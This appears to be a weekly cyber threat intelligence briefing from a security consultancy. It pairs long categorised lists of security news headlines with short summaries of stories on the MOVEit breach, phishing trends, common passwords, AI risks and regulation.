One in five DocuSign spoofs targeting businesses found to be impersonations of regulatory agencies | SC Media

What is a whaling attack (whaling phishing)? | Definition from TechTarget

Job termination scam warns staff of phony Employment Tribunal decision | CSO Online

'Scattered Spider' scammers charged in sophisticated, million-dollar phishing scheme | Mashable

Microsoft Takes Phishing-as-a-Service Platform to Court

Fake Donald Trump Assassination Story Used in Phishing Scam - Infosecurity Magazine

No, Microsoft doesn't have dirt on you, it's just a sextortion scam - Neowin

Microsoft 365 Admin portal abused to send sextortion emails

North Korean IT Worker Network Tied to BeaverTail Phishing Campaign - Infosecurity Magazine

New phishing scam targeting companies with fake gov’t requests: What FBI says to do

Other Social Engineering

60% of Emails with QR Codes Classified as Spam or Malicious - Infosecurity Magazine

NCSC Warns UK Shoppers Lost £11.5m Last Christmas - Infosecurity Magazine

6 Reasons Social Engineering Is More Successful in Holiday Seasons | Mimecast

'Scam yourself' attacks just increased over 600% - here's what to look for | ZDNET

Malicious QR codes sent in the mail deliver malware | Malwarebytes

UK consumers losing more than ever to holiday scams | Computer Weekly

Fake Discount Sites Exploit Black Friday to Hijack Shopper Information

Security Alert: Fake Accounts Threaten Black Friday Gaming Sales - Security Boulevard

‘ClickFix’ Cyber-Attacks for Malware Deployment on the Rise - Infosecurity Magazine

Meta cracks down on millions of accounts it tied to pig-butchering scams | CyberScoop

Watch Out for Malicious QR Codes Sent Through the Mail

Cyber security chief warns Black Friday shoppers to be alert to scams | The Standard

Don't Fall for This Fake Image Generator and Its Political AI Slop

No, Microsoft doesn't have dirt on you, it's just a sextortion scam - Neowin

Active network of North Korean IT front companies exposed - Help Net Security

You Can Prevent Smishing Scams With These Features and Tricks

Artificial Intelligence

AI fuels 244% surge in digital forgeries, says new study

97% of organisations hit by Gen AI-related security breaches, survey finds

One Deepfake Digital Identity Attack Hits Every Five Minutes - Infosecurity Magazine

Google Issues New Security Cloaking Warning As Attackers Use AI In Attacks

Majority of UK businesses lack readiness for rising AI-led phishing attacks, reveals survey

76% of Cyber security Professionals Believe AI Should Be Heavily Regulated, New Study by StrongDM Finds

Largest Companies View AI as a Risk Multiplier

Terrorists Exploit AI for Propaganda and Operations, Exposing Critical Gaps in Tech Safeguards - The Media Line

Don't Fall for This Fake Image Generator and Its Political AI Slop

Phishing on the Rise: CUJO AI Blocks Over 12,000 Attacks per Minute

The limits of AI-based deepfake detection - Help Net Security

Microsoft Data Security Index annual report highlights evolving generative AI security needs | Microsoft Security Blog

OWASP Warns of Growing Data Exposure Risk from AI in New Top 10 List - Infosecurity Magazine

Supply chain threats highlight security gaps in LLMs and AI | TechRadar

AI in Cyber Crime: Hackers Exploiting OpenAI - Security Boulevard

Fake AI video generators infect Windows, macOS with infostealers

AI About-Face: 'Mantis' Turns LLM Attackers Into Prey

Artificial intelligence, international security, and the risk of war

Did you play Pokémon Go? You didn't know it, but you were training AI to map the world | ZDNET

Malware

Phishing emails increasingly use SVG attachments to evade detection

Don’t Hold Down The Ctrl Key—New Warning As Cyber Attacks Confirmed

Malicious QR codes sent in the mail deliver malware | Malwarebytes

Fortinet VPN Zero-Day Exploited in Malware Attacks Remains Unpatched: Report - SecurityWeek

‘ClickFix’ Cyber-Attacks for Malware Deployment on the Rise - Infosecurity Magazine

Watch Out for Malicious QR Codes Sent Through the Mail

New Stealthy BabbleLoader Malware Spotted Delivering WhiteSnake and Meduza Stealers

Scammers resort to physical Swiss post to spread malware • The Register

Fake Bitwarden ads on Facebook push info-stealing Chrome extension

Don't Fall for This Fake Image Generator and Its Political AI Slop

Fake AI video generators infect Windows, macOS with infostealers

NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data

Warning: DEEPDATA Malware Exploiting Unpatched Fortinet Flaw to Steal VPN Credentials

Botnet exploits GeoVision zero-day to install Mirai malware

Researchers unearth two previously unknown Linux backdoors - Help Net Security

Lumma Stealer Proliferation Fueled by Telegram Activity - Infosecurity Magazine

Black Lotus, Emotet, Beep, and Dark Pink, still the top malware threats of 2024 | SC Media

Microsoft accused of Malware-like Bing Wallpaper app - gHacks Tech News

Bots/Botnets

'Water Barghest' Sells Hijacked IoT Devices for Proxy Botnet Misuse

Dangerous global botnet fueling residential proxies is being hit in major crackdown | TechRadar

Botnet serving as ‘backbone’ of malicious proxy network taken offline  | CyberScoop

Mobile

The Urgent And Critical Need To Prioritize Mobile Security - SecurityWeek

No work phone? Companies tell staff to bring their own

Mobile UK on fraud ahead of Reeves' Mansion House speech

Google Issues New Security Cloaking Warning As Attackers Use AI In Attacks

Protect Your Phone From Juice Jacking: Public Charging Risks Explained

New Ghost Tap attack abuses NFC mobile payments to steal money

NSO Group used another WhatsApp zero-day after being sued, court docs say

LightSpy Spyware Operation Expands to Windows - SecurityWeek

It’s Time to Get Paranoid About Your Phone, Says This Security Expert | KQED

iOS 18 reboots iThings after 72 hours - secretly and smartly • The Register

This hacking tool can unlock an iPhone 16. Here's how it works | Digital Trends

You Can Prevent Smishing Scams With These Features and Tricks

Denial of Service/DoS/DDoS

DDoS Attack Growing Bigger & Dangerous, New Report Reveals

Internet of Things – IoT

Threat Actor Turns Thousands of IoT Devices Into Residential Proxies - SecurityWeek

'Water Barghest' Sells Hijacked IoT Devices for Proxy Botnet Misuse

Eken hit with $700K fine for putting an inactive address on FCC filings - The Verge

Data Breaches/Leaks

Ten Lessons Learned from The Mother of All Breaches Data Leak - Security Boulevard

97% of organisations hit by Gen AI-related security breaches, survey finds

Fintech giant Finastra confirms it's investigating a data breach | TechCrunch

Equinox discloses data breach involving health info of clients, staff | Reuters

T-Mobile confirms it was hacked in recent wave of telecom breaches

What is Data Egress? How It Works and How to Manage Costs | Definition from TechTarget

Threat actor sells data of +750,000 patients from a French hospital

US-UK Armed Forces Dating Service Exposes Over 1 Million Records Online

We Can Do Better Than Free Credit Monitoring After a Breach

Breaches Don't Have to Be Disasters

The Crucial Influence of Human Factors in Security Breaches - Security Boulevard

171K AnnieMac customers informed of data breach • The Register

Space tech giant Maxar confirms hacker accessed employees' personal data | TechCrunch

Ford 'actively investigating' breach claims • The Register

Ford rejects breach allegations, says customer data not impacted

Helpline for Yakuza victims fears it leaked personal info • The Register

Andrew Tate Hack: Online Course Data Breached

Organised Crime & Criminal Actors

Cyber criminals don’t take holidays warns expert

Microsoft killed 240 sites selling ONNX phishing kits

5 Scattered Spider Gang Members Indicted in Multi-Million Dollar Cyber Crime Scheme

Threat Actor Turns Thousands of IoT Devices Into Residential Proxies - SecurityWeek

Zimbabwe police arrest 1,000 cyber criminals - Bulawayo24 News

Targeting the Cyber Crime Supply Chain - Microsoft On the Issues

US seizes PopeyeTools cyber crime marketplace, charges administrators

AI in Cyber Crime: Hackers Exploiting OpenAI - Security Boulevard

Russian women stepping up for cyber crime outfits | SC Media

UK supports Nigeria to tackle cyber threats

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Man Who Stole and Laundered Roughly $1B in Bitcoin Is Sentenced to 5 Years in Prison - SecurityWeek

Crypto Tool or Data Thief? How Meme-Token-Hunter-Bot and Its Clones Steal from macOS Users | HackerNoon

Now BlueSky hit with crypto scams as it crosses 20 million users

Insider Risk and Insider Threats

The Crucial Influence of Human Factors in Security Breaches - Security Boulevard

Insurance

Cyber Threats, Changes in Climate, and Business Interruption are Insurance Buyers’ and Sellers’ Top Risk Concerns, Says New Munich Re/Triple-I Survey | Business Wire

Coalition highlights 68% surge in ransomware claims severity - Reinsurance News

Cyber threats, climate change, and BI lead insurance concerns: Munich Re & Triple-I - Reinsurance News

Cyber insurers address ransom reimbursement policy concerns | TechTarget

Marsh launches cyber security compliance program | Insurance Business America

CISOs can now obtain professional liability insurance | CyberScoop

Supply Chain and Third Parties

Supply chain attacks up over 400 percent since 2021

Soaring cyber risks: Large enterprises, supply chains and key industries in the crosshairs

IT pros revise pipelines for software supply chain security | TechTarget

Gatwick Airport's Cyber Security Chief on Supply Chain Risks - Infosecurity Magazine

Cloud/SaaS

Cloud ransomware threats rise, targeting S3 & Azure

Cracking the Code: Tackling the Top 5 Cloud Security Challenges - Security Boulevard

Ransomware Groups Use Cloud Services For Data Exfiltration - Infosecurity Magazine

Outages

After the CrowdStrike disaster, Microsoft is improving Windows security to avoid outages

Identity and Access Management

One Deepfake Digital Identity Attack Hits Every Five Minutes - Infosecurity Magazine

The Problem of Permissions and Non-Human Identities - Why Remediating Credentials Takes Longer Than You Think

The trouble with identity in an increasingly fake world | SC Media

Privileged Accounts, Hidden Threats: Why Privileged Access Security Must Be a Top Priority

Five Cyber Agencies Sound Alarm About Active Directory Attacks: Beyond the Basics - Security Boulevard

10 Most Impactful PAM Use Cases for Enhancing Organisational Security

Encryption

Now Online Safety Act is law, UK outlines 'priorities' • The Register

NIST Publishes Draft Strategy For Post-Quantum Cryptography Transition

Linux and Open Source

Ubuntu Linux impacted by decade-old 'needrestart' flaw that gives root

Debunking myths about open-source security - Help Net Security

Open Cyber Security Schema Framework (OCSF) Joins the Linux Foundation to Optimize Critical Security Data

Linux Variant of Helldown Ransomware Targets VMware

Researchers unearth two previously unknown Linux backdoors - Help Net Security

Passwords, Credential Stuffing & Brute Force Attacks

123456 is the world's most popular password – again | Tom's Guide

Research Highlights SHA256 Password Security Strengths and Risks - IT Security Guru

700,000 passengers suffered delays after password of engineer allowed to work remotely... - LBC

Navigating NIST’s updated password rotation guidelines | TechRadar

More than 200 major companies already support passkeys

Put your usernames and passwords in your will, Japan advises • The Register

Social Media

Ireland orders X, TikTok and Instagram to curb terrorist content | Ireland | The Guardian

Fake Bitwarden ads on Facebook push info-stealing Chrome extension

Meta cracks down on millions of accounts it tied to pig-butchering scams | CyberScoop

NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data

Canada Shuts Down TikTok Office Over National Security Risks

Now BlueSky hit with crypto scams as it crosses 20 million users

Malvertising

Fake Bitwarden ads on Facebook push info-stealing Chrome extension

NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data

How does malvertising work? | TechTarget

Training, Education and Awareness

Cyber Awareness Is a Joke: Here’s How to Actually Prepare for Attacks

New educational campaign "Flex Your Cyber" launched - IT Security Guru

KnowBe4 Releases 2024 Holiday Kit to Boost Cyber Resilience - IT Security Guru

Regulations, Fines and Legislation

Cyber Security Transparency Under Fire: Tech Firms Pay Big for Downplaying SolarWinds Breaches | Miller Nash LLP - JDSupra

The SEC Cyber Security Rule: Awareness Rises, Compliance Lags - Security Boulevard

76% of Cyber Security Professionals Believe AI Should Be Heavily Regulated, New Study by StrongDM Finds

The Cyber Resilience Act published

NIS 2 Directive: Transposition Period is Up for EU Member States | Jones Day - JDSupra

ENISA's Draft NIS2 Guidance Consultation for Industry

Beyond The EU: How British Businesses Can Prepare For NIS2

EU Council approves declaration on international law in cyber space - JURIST - News

Preparing for DORA Compliance in 2025 - Financial News

Increased GDPR Enforcement Highlights the Need for Data Security

A Fifth of UK Enterprises “Not Sure” If NIS 2 Applies - Infosecurity Magazine

Now Online Safety Act is law, UK outlines 'priorities' • The Register

What CISOs need to know about the SEC’s breach disclosure rules | CSO Online

CISA no more? Rand Paul has a plan, and it’s not good for US cyber defenders | Cybernews

Trump 2.0 May Mean Fewer Cyber Security Regs

With Rise in Healthcare Data Breaches, Compliancy Group Urges Organisations to Complete Their HIPAA Security Risk Assessments

The Accountability Dilemma: Civilian Cyber Vigilantism and International Law | directions blog

What a second Trump term means for the future of ransomware | TechCrunch

Why the NIS2 Directive causes growing pains for businesses - Help Net Security

CISA Dir. Jen Easterly to Resign on Inauguration Day

Czech banks on alert: Czech National Bank's adoption of TIBER-EU signals new era in cyber security supervision

With Tech Considerations for Securities Lawyers | Mayer Brown Free Writings + Perspectives - JDSupra

Models, Frameworks and Standards

A Fifth of UK Enterprises “Not Sure” If NIS 2 Applies - Infosecurity Magazine

The Cyber Resilience Act published

NIS 2 Directive: Transposition Period is Up for EU Member States | Jones Day - JDSupra

ENISA's Draft NIS2 Guidance Consultation for Industry

Beyond The EU: How British Businesses Can Prepare For NIS2

Preparing for DORA Compliance in 2025 - Financial News

Increased GDPR Enforcement Highlights the Need for Data Security

With Rise in Healthcare Data Breaches, Compliancy Group Urges Organisations to Complete Their HIPAA Security Risk Assessments

Open Cyber Security Schema Framework (OCSF) Joins the Linux Foundation to Optimize Critical Security Data

NIST Publishes Draft Strategy For Post-Quantum Cryptography Transition

Backup and Recovery

Five backup lessons learned from the UnitedHealth ransomware attack - Help Net Security

Law Enforcement Action and Take Downs

5 Scattered Spider Gang Members Indicted in Multi-Million Dollar Cyber Crime Scheme

Brit charged in US over Scattered Spider cyber attacks | Computer Weekly

Man Who Stole and Laundered Roughly $1B in Bitcoin Is Sentenced to 5 Years in Prison - SecurityWeek

US seizes PopeyeTools cyber crime marketplace, charges administrators

Man avoids conviction after hacker finds AI-generated child exploitation images on his computer - NZ Herald

Office of Public Affairs | California Teenager Pleads Guilty in Florida to Making Hundreds of ‘Swatting’ Calls Across the United States | United States Department of Justice

Zimbabwe police arrest 1,000 cyber criminals - Bulawayo24 News

Alleged Russian Phobos ransomware administrator extradited to U.S., in custody | CyberScoop

UK supports Nigeria to tackle cyber threats

Misinformation, Disinformation and Propaganda

Terrorists Exploit AI for Propaganda and Operations, Exposing Critical Gaps in Tech Safeguards - The Media Line

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Artificial intelligence, international security, and the risk of war

Sweden, Finland and Norway release new advice on surviving war - BBC News

Nation State Actors

China

A Look at Trending Chinese APT Techniques | Intel 471

UK warned of cyber threats from China-backed Volt Typhoon

China Espionage Soon ‘the Number 1 Issue’ for US Security Community: Cyber Security Expert | NTD

Chinese hackers are using this open-source VPN to mask spying activities | TechRadar

T-Mobile confirms it was hacked in recent wave of telecom breaches

Chinese Hackers Exploit T-Mobile and Other U.S. Telecoms in Broader Espionage Campaign

Cyber-espionage group Volt Typhoon resurfaces globally

LightSpy Spyware Operation Expands to Windows - SecurityWeek

China-Backed Hackers Leverage SIGTRAN, GSM Protocols to Infiltrate Telecom Networks

State-Sponsored Cyber Attacks: T-Mobile, Singtel Breaches & AI/ML in Telecom Security - Modern Diplomacy

Chinese APT Group Targets Telecom Firms Linked to BRI - Infosecurity Magazine

Chinese spies, Musk’s biz ties, ‘a real risk’ to US security • The Register

Chinese spies and the security of America's networks

China's Liminal Panda APT Attacks Telcos, Steals Data

Chinese ship casts shadow over Baltic subsea cable snipfest • The Register

Suspected undersea cable sabotage had ‘little-to-no observable impact’ on internet service and quality — Cloudflare says suspected sabotage incident mitigated with redundant design | Tom's Hardware

Canada Shuts Down TikTok Office Over National Security Risks

Lithuania bans remote Chinese access to solar, wind, storage devices – pv magazine International

Coast Guard Warns of Continued Risks in Chinese Port Cranes

Russia

UAWire - Russia's hybrid warfare tactics intensify: EU faces heightened threat from espionage and cyber attacks

Severed subsea internet cables raise network security questions | ITPro

Suspected undersea cable sabotage had ‘little-to-no observable impact’ on internet service and quality — Cloudflare says suspected sabotage incident mitigated with redundant design | Tom's Hardware

Sweden, Finland and Norway release new advice on surviving war - BBC News

Russian women stepping up for cyber crime outfits | SC Media

FBI says BianLian based in Russia, moving from ransomware attacks to extortion

BianLian Ransomware Group Adopts New Tactics, Posing Significant Risk - Infosecurity Magazine

Russian sanctions busting linked to British Overseas Territories

Undersea cable between Germany and Finland severed - BBC News

Finland and Lithuania Report Severed Undersea Data Cables - Bloomberg

Fears of sabotage rise after Baltic cable disruptions

North Korea

North Korean Front Companies Impersonate US IT Firms to Fund Missile Programs

Active network of North Korean IT front companies exposed - Help Net Security

North Korean IT Worker Network Tied to BeaverTail Phishing Campaign - Infosecurity Magazine

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Terrorists Exploit AI for Propaganda and Operations, Exposing Critical Gaps in Tech Safeguards - The Media Line

LightSpy Spyware Operation Expands to Windows - SecurityWeek

NSO Group used another WhatsApp zero-day after being sued, court docs say

The Accountability Dilemma: Civilian Cyber Vigilantism and International Law | directions blog

Tools and Controls

The Urgent And Critical Need To Prioritize Mobile Security - SecurityWeek

No work phone? Companies tell staff to bring their own

Rethinking Cyber Security From Cost Center To Value Driver

Cyber Threats, Changes in Climate, and Business Interruption are Insurance Buyers’ and Sellers’ Top Risk Concerns, Says New Munich Re/Triple-I Survey | Business Wire

Cyber threats, climate change, and BI lead insurance concerns: Munich Re & Triple-I - Reinsurance News

Companies Take Over Seven Months to Recover From Cyber Incidents - Infosecurity Magazine

State of SIEM Detection Risk: A Wake-Up Call for Enterprise Security Teams - Security Boulevard

Why Custom IOCs Are Necessary for Advanced Threat Hunting and Detection - SecurityWeek

5 Threat Intel Tricks MSSPs Can Use to Thwart Adversaries | MSSP Alert

Underfunded, under pressure: We must act to support cyber teams | Computer Weekly

Overcoming the cyber paradox: Shrinking budgets – growing threats | Computer Weekly

Chris Inglis: Why cyber security success hinges on strategic choices, not just tech | SC Media

The Problem of Permissions and Non-Human Identities - Why Remediating Credentials Takes Longer Than You Think

The trouble with identity in an increasingly fake world | SC Media

How Cloud Security Advances Help Future-Proof Resilience

Privileged Accounts, Hidden Threats: Why Privileged Access Security Must Be a Top Priority

Avoiding Common API Security Mistakes

Hackers Aren’t Cutting Back, Why is Your Security Budget?

Applying the Enterprise Risk Mindset to Navigate Cyber Security Threats - New Risk Mindset Series | Mayer Brown - JDSupra

Five Cyber Agencies Sound Alarm About Active Directory Attacks: Beyond the Basics - Security Boulevard

Adopting more security tools doesn't keep you safe, it just overloads your teams and creates greater risks | ITPro

Cross-Site Scripting: 2024's Most Dangerous Software

Cyber criminals hijack DNS to build stealth attack networks - Help Net Security

Unlocking the power of public data to make your security team faster and more effective | SC Media

Safeguarding the DNS through registries - Help Net Security

Red red team team: threat actors hire pentesters to test out ransomware effectiveness | SC Media

Weaponized pen testers are becoming a new hacker staple | CSO Online

5 Questions CISOs Should Be Asking Regarding DSPM

8 Security Risks Of Shared Email Accounts - Security Boulevard

Guarding Your Brand: Why Domain Protection is Essential for Every Business Owner - Security Boulevard

Insights from Cohesity on cyber resilience as a technical team sport - SiliconANGLE

Eight essential steps to fortify cyber security after a breach | SC Media

The limits of AI-based deepfake detection - Help Net Security

Navigating NIST’s updated password rotation guidelines | TechRadar

How Can PR Protect Companies During a Cyber Attack?

We Need to Talk: Breaking up With Your SIEM Vendor | MSSP Alert

Other News

Severed subsea internet cables raise network security questions | ITPro

Cyber Security is Everyone’s Responsibility - Security Boulevard

8 Security Risks Of Shared Email Accounts - Security Boulevard

300 Drinking Water Systems in US Exposed to Disruptive, Damaging Hacker Attacks - SecurityWeek

Cross-Site Scripting: 2024's Most Dangerous Software

Weaponized pen testers are becoming a new hacker staple | CSO Online

Eight essential steps to fortify cyber security after a breach | SC Media

Telecom Cable Disruption Reported Between Finland and Germany - Nord News

Poor cyber hygiene enabled nearly 30% of cyber attacks last quarter | StateScoop

Cyber attack leaves Stop & Shop shelves empty 10 days before Thanksgiving - CBS News

6 Ways Your Computer Isn't as Secure as You Think

The rising tide of maritime cyberthreats in global trade | TechRadar

Nearly 90% of UK industrial firms hit by cyber attacks in past year - Drives&Controls

ICS Security: 145,000 Systems Exposed to Web, Many Industrial Firms Hit by Attacks - SecurityWeek

5 alarming Windows cyber security facts you probably don’t know

Cisco reveals top cyber security threats trends

Expert warns construction industry on costly ransomware attacks | Project Scotland

Australian government cyber security falls in global ranking | The Canberra Times | Canberra, ACT

Cyber security tips for the education sector | Education Business

Navigating the surge of cyber threats in global maritime

Thames Water’s IT ‘falling apart’ and is hit by cyber-attacks, sources claim | Thames Water | The Guardian

Thames Water Dismisses Claims on Cyber-Attacks | SC Media UK

Fortra Reports Alarming Increase In Abuse Of Cloudflare Services

Airplane cyber security: Past, present, future

70% of Hong Kong companies saw cyber attacks in 2024

Gambling and lottery giant disrupted by cyber attack, working to bring systems back online

CISA Director Jen Easterly to depart agency on January 20 | TechCrunch

Vulnerability Management

Microsoft beefs up Windows security with new recovery and patching features | TechCrunch

CWE top 25 most dangerous software weaknesses - Help Net Security

MITRE shares 2024's top 25 most dangerous software weaknesses

Vulnerabilities

Critical 9.8-rated VMware vCenter RCE bug under exploit • The Register

Warning: VMware vCenter and Kemp LoadMaster Flaws Under Active Exploitation

Microsoft Vulnerability Poses Risk To Domain Control

Critical RCE bug in VMware vCenter Server now exploited in attacks

Mystery Palo Alto Networks 0-day RCE now actively exploited • The Register

PAN-OS Firewall Vulnerability Under Active Exploitation – IoCs Released

Fortinet VPN Zero-Day Exploited in Malware Attacks Remains Unpatched: Report - SecurityWeek

Millions of WordPress sites potentially hijackable due to critical plugin bug | SC Media

Apple Releases Urgent Updates to Patch Actively Exploited Zero-Day Vulnerabilities

Chrome Security Update, Fix For Multiple Vulnerabilities

Ubuntu Linux impacted by decade-old 'needrestart' flaw that gives root

Fortinet VPN design flaw hides successful brute-force attacks

Microsoft pauses Exchange security updates over buggy patch • The Register

Microsoft Pulls Exchange Patches Amid Mail Flow Issues

Security plugin flaw in millions of WordPress sites gives admin access

Oracle patches exploited Agile PLM vulnerability (CVE-2024-21287) - Help Net Security

Linux Variant of Helldown Ransomware Targets VMware

Exploitation Attempts Target Citrix Session Recording Vulnerabilities - SecurityWeek

Helldown ransomware exploits Zyxel VPN flaw to breach networks

NSO Group used another WhatsApp zero-day after being sued, court docs say

D-Link urges users to retire VPN routers impacted by unfixed RCE flaw

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Massive MOVEit Vulnerability Breach: Hacker Leaks Employee Data from Amazon, McDonald’s, HSBC, HP, and Potentially 1000+ Other Companies

A recent massive data breach exploiting a vulnerability in MOVEit file transfer software has exposed sensitive employee data from major companies globally. This incident is one of the largest corporate information leaks, affecting sectors such as finance, healthcare, technology, and retail. The breach resulted in detailed employee records being stolen from 25 leading organisations, including Amazon with over 2.8 million records and MetLife with over 585,000 records. The leaked data includes names, email addresses, phone numbers, and organisational structures, posing significant risks for phishing and identity theft. This incident highlights the critical importance of promptly applying security patches and reinforces the need for robust cyber security measures to protect sensitive corporate data.

Phishing Attacks Surge in 2024 as Cyber Criminals Adopt AI Tools and Multi-Channel Tactics

A recent report has found that phishing attacks surged by 28% in Q2 2024, with cybercriminals adopting AI tools and multi-channel tactics. Organisations with over 2,000 employees now face approximately 36 phishing emails per day, overwhelming security systems. There was a 52.2% increase in phishing attacks that bypass secure email gateways, using techniques like QR codes, deepfakes, and HTML smuggling. Payloadless attacks (phishing without links or attachments, instead using social engineering to deceive victims) have risen to nearly 19% of phishing attempts in 2024, up from 5.4% in 2021. Businesses must enhance security measures and foster awareness to combat these sophisticated threats.

Critical Vulnerabilities Persist in Finance and Insurance Sectors

Cyber security provider Black Duck has found that the finance and insurance sectors have the highest number of critical vulnerabilities, with small sites averaging 565 and medium sites 580. Healthcare and social assistance follow closely behind. The most critical issues identified were cryptographic failures and injection vulnerabilities, totalling over 34,800 instances. These weaknesses threaten sensitive data like personally identifiable information and financial records, posing significant business risks. The mean time to remediate varies, with finance addressing issues in 28 days due to strict regulations, while utilities take up to 107 days. Widespread security misconfigurations affect 98% of applications, endangering business continuity and service availability.

AI-Based Attacks Top Gartner’s List of Emerging Threats – Again

Gartner reports that AI-based threats remain the top emerging cyber risks for organisations, with 80% of surveyed executives highlighting AI-enhanced malicious attacks as a major concern. This marks the third consecutive quarter where AI leads in risk rankings. The difficulty in finding skilled AI and cyber security talent is prompting companies to turn to Managed Security Service Providers (MSSPs) for assistance. MSSPs are leveraging AI to combat sophisticated cyber attacks, and over 80% now offer AI-related security services. This represents a significant shift as enterprises struggle to protect themselves against increasingly complex AI-driven threats.

Here Are the Top 10 Passwords for 2024, and They're All Embarrassing

NordPass, in collaboration with NordStellar, has found that weak passwords remain a significant security risk for organisations and individuals alike. Their sixth annual report revealed that '123456' is the most common password globally, used by over 3 million personal users and more than 1.2 million corporate users. The report highlighted that despite increased awareness of password security, it takes less than a second to crack these widely used passwords. Nearly all organisations still face password management challenges, with many employees reusing simple passwords across accounts. The study underscores the need for stronger password practices, including adopting password managers.

Mishing: The Rising Mobile Attack Vector Facing Every Organisation

Recent research highlights that mobile-targeted phishing attacks, collectively termed "mishing", are an escalating threat to organisations. The widespread use of mobile devices for accessing sensitive data has made them prime targets for cyber criminals employing tactics like smishing, vishing and quishing. These attacks exploit unique mobile features, increasing user vulnerability. Despite this rising threat, many organisations lack adequate mobile security measures and underestimate the associated risks. To combat mishing, it is imperative for organisations to implement comprehensive mobile threat defences and educate employees on recognising and avoiding such attacks.

80% Of Surveyed Businesses Don’t Have Plans for an AI-Related Crisis

Riskonnect's recent report highlights that 80% of organisations lack a dedicated plan to address generative AI risks, including AI-driven fraud attacks. Among surveyed professionals, 72% reported that cyber security risks are having a significant or severe impact on their organisations (an increase from last year's 47%) and 24% believe AI-powered cyber security threats will have the biggest impact over the next 12 months. Despite growing concerns over AI ethics, privacy, and security, 65% of companies have not established policies governing the use of generative AI by partners and suppliers, leaving critical risk management gaps unaddressed.

BoE and Regulators Set Out Digital Rules to Cut Cyber Attack Risks

The Bank of England and UK financial regulators have introduced new rules to enhance IT resilience in financial firms, aiming to reduce risks from cyber attacks and power outages. Effective from 1 January next year, these measures require critical third-party providers to report major incidents and conduct resilience testing. While these providers boost competitiveness, reliance on a few increases systemic risk, potentially affecting consumers and the UK's financial stability. Regulators stress that firms remain accountable for operational resilience, underscoring the need to manage disruption risks to uphold the UK's reputation for stable financial services.

Employees Are Hiding Their AI Use from Their Managers. Here's Why

New research from Slack reveals that enthusiasm for artificial intelligence among employees is waning, with excitement dropping from 47% to 41% globally. Nearly half of desk workers feel uncomfortable with their managers knowing they use AI for common tasks, fearing perceptions of laziness or incompetence. Despite 99% of executives planning to invest in AI this year, a significant skills gap persists, with 61% of employees spending less than five hours learning to use AI tools. The report highlights the need for clear policies and training to address uncertainties and fully harness AI's potential.

CISOs in 2025: Balancing Security, Compliance, and Accountability

Recent regulatory changes, including new SEC and NYDFS rules in the US, have heightened CISO accountability by requiring rapid incident disclosures and increasing personal liability. This intensifies pressures on CISOs, making the role less attractive due to potential legal repercussions and heightened stress. Looking ahead to 2025, CISOs will need advanced skills in strategic communication, risk management, and understanding emerging technologies like AI. Top priorities now include optimising existing security investments, enhancing defences against AI-driven cyber attacks, and investing in advanced cloud security capabilities.

48% of Small Businesses Don’t Offer Cyber Security Training

Recent research has revealed that 48% of UK small businesses do not provide cyber security awareness training to employees. Cyber threats are increasing in volume and complexity, particularly with the rise of AI, yet nearly half (47%) lack up-to-date anti-virus software and 15% have no firewall protection. 81% do not have a valid disaster recovery plan, and 29% have no patch management in place. With 2.39 million businesses experiencing cyber crime in the last 12 months, there is a clear need for businesses to improve their cyber security stance, both technologically and through employee awareness.

Thousands of Employees Could be Falling Victim to Obvious Phishing Scams Every Month

Cyber security provider Netskope has found that phishing attacks are a significant threat in the banking sector, with three in every 1,000 employees clicking on phishing links each month. This equates to over 1,000 banking workers in the UK potentially compromising security monthly. Russian criminal groups are identified as the most active attackers.

Sources:

https://www.infostealers.com/article/massive-moveit-vulnerability-breach-hacker-leaks-employee-data-from-amazon-mcdonalds-hsbc-hp-and-potentially-1000-other-companies/

https://www.techradar.com/pro/phishing-attacks-surge-in-2024-as-cybercriminals-adopt-ai-tools-and-multi-channel-tactics

https://www.helpnetsecurity.com/2024/11/15/finance-industry-vulnerabilities/

https://www.msspalert.com/news/ai-based-attacks-top-gartners-list-of-emerging-threats-again

https://www.cnet.com/tech/services-and-software/here-are-the-top-10-passwords-for-2024-and-theyre-all-embarrassing/

https://www.zimperium.com/blog/mishing-the-rising-mobile-attack-vector-facing-every-organization/

https://www.forbes.com/sites/edwardsegal/2024/11/10/80-of-surveyed-businesses-dont-have-plans-for-an-ai-related-crisis/

https://www.mortgagestrategy.co.uk/news/boe-and-regulators-set-out-digital-rules-to-cut-cyber-attack-risks/

https://www.zdnet.com/article/employees-are-hiding-their-ai-use-from-their-managers-heres-why/

https://www.helpnetsecurity.com/2024/11/13/daniel-schwalbe-domaintools-cisos-2025/

https://www.nationalworld.com/business/48-of-small-businesses-dont-offer-cybersecurity-training-4858633

https://www.techradar.com/pro/security/thousands-of-employees-could-be-falling-victim-to-obvious-phishing-scams-every-month  

Governance, Risk and Compliance

48% of small businesses don’t offer cyber security training

Failed security controls cost businesses billions

Expert Insight: The digital pandemic: How cyber threats are threatening life as we know it - IT Security Guru

BoE and regulators set out digital rules to cut cyber-attack risks – Mortgage Strategy

